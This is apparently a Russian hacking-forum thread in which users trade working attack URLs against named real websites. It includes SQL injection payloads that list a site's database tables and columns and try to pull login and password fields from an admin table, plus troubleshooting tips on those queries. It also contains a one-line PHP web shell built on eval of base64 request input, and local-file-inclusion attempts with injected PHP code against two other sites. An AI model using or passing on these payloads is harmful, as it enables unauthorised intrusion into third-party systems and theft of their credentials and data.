Ваши вопросы по уязвимостям.

так те ссылочки что оставил ettee уже не работают

 

Попробуй этот

 

та попробовать то можно но чем я заменю функцию

<?php eval(base64_decode($_REQUEST[cmd])); ?>

?

 

http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+


Как вывести все поля из этой таблицы?
В title ответ

 

Code:

http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x52726567696f6e7341646d696e73--+a

Где
0x52726567696f6e7341646d696e73 == RregionsAdmins в HEX.

 

Code:

http://www.svrwheels.ru
/index.php?pageId=-2+union+select+1,Group_concat%28column_name%29,3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.columns+Where+table_name=0x52726567696f6e7341646d696e73+--+

Ereee опередил...

 

Спасибо!
А как вывести структуру бд?
как тут http://i.imgur.com/5e1qH.png



UPD:

Почему
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,pass,login,4,5,6,7,8,9,10+FROM+0x52726567696f6e7341646d696e73+--+


ничего не выводит, кроме ошибки? Что не так?

 

Структура:

Code:

http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,(select%20@pro%20from%20(%20select%20@pro:=0x2727,%20(select%20null%20from%20information_schema.tables%20where%20concat(table_schema,0x2e,table_name)%20not%20in(%20@pro:=concat(@pro,0x2c27,table_schema,0x2e,table_name,0x27))limit%200,1))f),3,4,5,6,7,8,9,10--+a

По-твоему вопросу:
1. Нельзя после FROM имя таблицы в hex переводит.
2. Твоя таблица в другой базе:

Code:

http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,concat(table_name,0x3a,table_schema),3,4,5,6,7,8,9,10+FROM+information_schema.tables+limit+51,1--+a

3. Тебе нужно потренироватся на буржуйских сайтах.
4. Пустая таблица:

Code:

http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,count(*),3,4,5,6,7,8,9,10+FROM+u261330_catalog.RregionsAdmins+limit+0,1--+a

В <title> написано, что записей "0".

 

что значит а после коммента?

 

дамы и господа прежде чем задавать какиелибо вопросы по SQL-иньекциям ознакомтись пожалуйсто со статьей http://forum.antichat.net/thread43966.html а потом только выесняйте непонятные моменты! ("а" обсолютно ничего не значит после комента, так как она закоментирована)

 

А я думал браузер удаляет пробел, если он в самом концу URL. Т.е. для браузера:
-- =--
А если сделать -- a, то не будет удалять пробел. Я так думал.

 

Ты правильно думал, только не браузер его удаляет, а есть приличный шанс нарваться например на trim().

winstrool у тебя все посты такие чёткие, что лучше тебе не писать совсем, а то ещё с группы выгонят не дай бог

 

а почему например тут так не получается?
http://www2.mati.ru/english/index.php?path=../../../../../../../../../../../proc/self/cmdline%00&%3C?php%20print%20php_uname%28%29;?%3E

или тут
http://bombaticket.ru/pg.php?p=../../../../../proc/self/cmdline%00&%3C?php%20print%20php_uname%28%29;?%3E

 

а ты через curl пробовал отсылать запрос?

 

ну да

 

Про инклуд, есть миллион статей, в которых описываются какие именно нужно инклюдить файлы, зачем везде инклюдить /proc/self/cmdline в который ничего не попадает из вашего запроса к серверу?

 

А как такое возможно в phpMyAdmin есть 4 одинаковых пользователя но у двоих из них File_priv Y а у двоих N,как это вообще понимать?

 

У них host одинаковый? Если нет, то понимать адекватно.
Если да - то админы мудаки.

 

http://www.allsoch.ru/soch/works.php?AuthorID=-3

Это является sql-inj?
Возможно ли раскрутить?

 

Дыры нету, просто при отрицательном параметре ошибка.